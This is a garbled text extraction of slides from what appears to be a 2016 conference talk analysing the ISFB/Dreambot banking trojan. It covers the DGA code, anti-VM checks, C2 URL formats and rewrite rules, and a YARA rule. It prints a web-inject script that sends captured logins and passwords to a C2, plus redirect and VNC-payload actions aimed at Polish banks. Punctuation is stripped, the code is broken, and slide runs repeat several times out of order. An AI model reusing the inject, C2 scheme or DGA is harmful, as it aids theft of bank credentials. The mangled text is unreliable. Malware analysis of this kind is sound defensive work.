DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)
PYTHON
3558
TOR
02122016 ISFB
httpslokalhostpltalksbotconf20161 3658
TOR
3658
02122016 ISFB
httpslokalhostpltalksbotconf20161 3758
P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet
C
3758
02122016 ISFB
httpslokalhostpltalksbotconf20161 3858
Internet is Hard
3858
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 1658
Anti-VM DeviceInfoDatacbSize = 28 if ( SetupDiEnumDeviceInfo(v1 0 ampDeviceInfoData) ) SetupDiGetDeviceRegistryPropertyA(v1 ampDeviceInfoData 0xCu ampProperty 0 0 ampPropertyBufferSize) if ( PropertyBufferSize ) v2 = (BYTE )xHeapAlloc(PropertyBufferSize) v3 = (CHAR )v2 if ( v2 ) if ( SetupDiGetDeviceRegistryPropertyA(DeviceInfoSetampDeviceInfoData0xCuampPropertyv2PropertyBufferSize ampPropertyBufferSize) ampamp (StrStrIA(v3 (LPCSTR)vbox) || StrStrIA(v3 qemu) || StrStrIA(v3 vmware) || StrStrIA(v3 virtual hd)) ) v0 = 1 xHeapFree(v3)
C
1658
02122016 ISFB
httpslokalhostpltalksbotconf20161 1758
String encryptionsigned int __stdcall decode_bss(int shift) v2 points to VA of bss if ( v2 ) return 2 v6 = v2‐gtVirtualAddress if ( v6 || v2‐gtSizeOfRawData ) return 192 v7 = v2‐gtSizeOfRawData v8 = (_DWORD )016 v9 = v13 v10 = (shift amp 0x1F) + ((_DWORD )29 2016 ^ (_DWORD )Oct 29 2016 ^ (v7 + v6)) XorDecryptBuffer(v7 (int )((char )v13 + v6) v2‐gtSizeOfRawData v10) dword_4064EC = dword_40766E + dword_407662 + dword_407666 if ( dword_40766E + dword_407662 + dword_407666 = 0xEE553B4E ) check if correctly decoded XorEncryptBuffer(dword_407662 (IMAGE_DOS_HEADER )((char )v9 + v2‐gtVirtualAddress) v2‐gtSizeOfRawData v14 = 12
C
1758
02122016 ISFB
httpslokalhostpltalksbotconf20161 1858
Joined resourcesor FJ-structs
typedef struct DWORD fj_magic DWORD addr DWORD size DWORD crc32_name DWORD flags or with 0x10000 mean it is packed with aPLib isfb_fj_elem
C
1858
02122016 ISFB
httpslokalhostpltalksbotconf20161 1958
Joined resourcesor J1-structs
typedef struct DWORD j1_magic DWORD flags can be aPLib packed DWORD crc32_name DWORD addr DWORD size isfb_fj_elem
C
‐ 0x4F75CEA70x9e154a0c CRC_CLIENT32 ‐ 0xD722AFCB0x8365B9570x8fb1dde1 CRC_CLIENT_INI ‐ 0xE1285E64 CRC_PUBLIC_KEY ‐ 0x90F8AAB40x41982e1f CRC_CLIENT64 ‐ 0x7A042A8A NEW ‐ UNKNOWN
1958
02122016 ISFB
httpslokalhostpltalksbotconf20161 2058
Static configuration typedef struct DWORD off DWORD flags QWORD value QWORD uid isfb_cfg_elem typedef struct QWORD count isfb_cfg_elem[count] char string_table[]
C
2058
Static cfg - fields
02122016 ISFB
httpslokalhostpltalksbotconf20161 2158
Static cfg - fields
0x556aed8f - server0xea9ea760 - bootstrap0x656b798a - botnet0x4fa8693e - key0xd0665bf6 0x75e6145c - domains0xefc574ae - dga_seed0x73177345 - dga_base_url0xec99df2e - dga_tld0xdf351e24 - tor32_dll0x510f22d2 - tor_domains
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2158
02122016 ISFB
httpslokalhostpltalksbotconf20161 2258
Static cfg
2258
02122016 ISFB
httpslokalhostpltalksbotconf20161 2358
Static cfg
2358
02122016 ISFB
httpslokalhostpltalksbotconf20161 2458
Static cfg
2458
02122016 ISFB
httpslokalhostpltalksbotconf20161 2558
Man in the Browser or where my goes my mony
Dynamic config
02122016 ISFB
httpslokalhostpltalksbotconf20161 2658
Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]
C
2658
02122016 ISFB
httpslokalhostpltalksbotconf20161 2758
Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()
2758
02122016 ISFB
httpslokalhostpltalksbotconf20161 2858
Web Actions
FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2858
02122016 ISFB
httpslokalhostpltalksbotconf20161 2958
Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin
2958
02122016 ISFB
httpslokalhostpltalksbotconf20161 3058
The Bot
Registry Keys
02122016 ISFB
httpslokalhostpltalksbotconf20161 3158
Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12
InstallClientNetCfgLastTaskLastConfig
middotmiddotmiddotmiddotmiddot
3158
02122016 ISFB
httpslokalhostpltalksbotconf20161 3258
Other Acctions
GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
3258
02122016 ISFB
httpslokalhostpltalksbotconf20161 3358
Calling Home
02122016 ISFB
httpslokalhostpltalksbotconf20161 3458
ET phone home
Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network
middotmiddotmiddotmiddot
3458
02122016 ISFB
httpslokalhostpltalksbotconf20161 3558
DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)
PYTHON
3558
TOR
02122016 ISFB
httpslokalhostpltalksbotconf20161 3658
TOR
3658
02122016 ISFB
httpslokalhostpltalksbotconf20161 3758
P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet
C
3758
02122016 ISFB
httpslokalhostpltalksbotconf20161 3858
Internet is Hard
3858
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 1758
String encryptionsigned int __stdcall decode_bss(int shift) v2 points to VA of bss if ( v2 ) return 2 v6 = v2‐gtVirtualAddress if ( v6 || v2‐gtSizeOfRawData ) return 192 v7 = v2‐gtSizeOfRawData v8 = (_DWORD )016 v9 = v13 v10 = (shift amp 0x1F) + ((_DWORD )29 2016 ^ (_DWORD )Oct 29 2016 ^ (v7 + v6)) XorDecryptBuffer(v7 (int )((char )v13 + v6) v2‐gtSizeOfRawData v10) dword_4064EC = dword_40766E + dword_407662 + dword_407666 if ( dword_40766E + dword_407662 + dword_407666 = 0xEE553B4E ) check if correctly decoded XorEncryptBuffer(dword_407662 (IMAGE_DOS_HEADER )((char )v9 + v2‐gtVirtualAddress) v2‐gtSizeOfRawData v14 = 12
C
1758
02122016 ISFB
httpslokalhostpltalksbotconf20161 1858
Joined resourcesor FJ-structs
typedef struct DWORD fj_magic DWORD addr DWORD size DWORD crc32_name DWORD flags or with 0x10000 mean it is packed with aPLib isfb_fj_elem
C
1858
02122016 ISFB
httpslokalhostpltalksbotconf20161 1958
Joined resourcesor J1-structs
typedef struct DWORD j1_magic DWORD flags can be aPLib packed DWORD crc32_name DWORD addr DWORD size isfb_fj_elem
C
‐ 0x4F75CEA70x9e154a0c CRC_CLIENT32 ‐ 0xD722AFCB0x8365B9570x8fb1dde1 CRC_CLIENT_INI ‐ 0xE1285E64 CRC_PUBLIC_KEY ‐ 0x90F8AAB40x41982e1f CRC_CLIENT64 ‐ 0x7A042A8A NEW ‐ UNKNOWN
1958
02122016 ISFB
httpslokalhostpltalksbotconf20161 2058
Static configuration typedef struct DWORD off DWORD flags QWORD value QWORD uid isfb_cfg_elem typedef struct QWORD count isfb_cfg_elem[count] char string_table[]
C
2058
Static cfg - fields
02122016 ISFB
httpslokalhostpltalksbotconf20161 2158
Static cfg - fields
0x556aed8f - server0xea9ea760 - bootstrap0x656b798a - botnet0x4fa8693e - key0xd0665bf6 0x75e6145c - domains0xefc574ae - dga_seed0x73177345 - dga_base_url0xec99df2e - dga_tld0xdf351e24 - tor32_dll0x510f22d2 - tor_domains
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2158
02122016 ISFB
httpslokalhostpltalksbotconf20161 2258
Static cfg
2258
02122016 ISFB
httpslokalhostpltalksbotconf20161 2358
Static cfg
2358
02122016 ISFB
httpslokalhostpltalksbotconf20161 2458
Static cfg
2458
02122016 ISFB
httpslokalhostpltalksbotconf20161 2558
Man in the Browser or where my goes my mony
Dynamic config
02122016 ISFB
httpslokalhostpltalksbotconf20161 2658
Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]
C
2658
02122016 ISFB
httpslokalhostpltalksbotconf20161 2758
Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()
2758
02122016 ISFB
httpslokalhostpltalksbotconf20161 2858
Web Actions
FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2858
02122016 ISFB
httpslokalhostpltalksbotconf20161 2958
Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin
2958
02122016 ISFB
httpslokalhostpltalksbotconf20161 3058
The Bot
Registry Keys
02122016 ISFB
httpslokalhostpltalksbotconf20161 3158
Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12
InstallClientNetCfgLastTaskLastConfig
middotmiddotmiddotmiddotmiddot
3158
02122016 ISFB
httpslokalhostpltalksbotconf20161 3258
Other Acctions
GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
3258
02122016 ISFB
httpslokalhostpltalksbotconf20161 3358
Calling Home
02122016 ISFB
httpslokalhostpltalksbotconf20161 3458
ET phone home
Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network
middotmiddotmiddotmiddot
3458
02122016 ISFB
httpslokalhostpltalksbotconf20161 3558
DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)
PYTHON
3558
TOR
02122016 ISFB
httpslokalhostpltalksbotconf20161 3658
TOR
3658
02122016 ISFB
httpslokalhostpltalksbotconf20161 3758
P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet
C
3758
02122016 ISFB
httpslokalhostpltalksbotconf20161 3858
Internet is Hard
3858
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
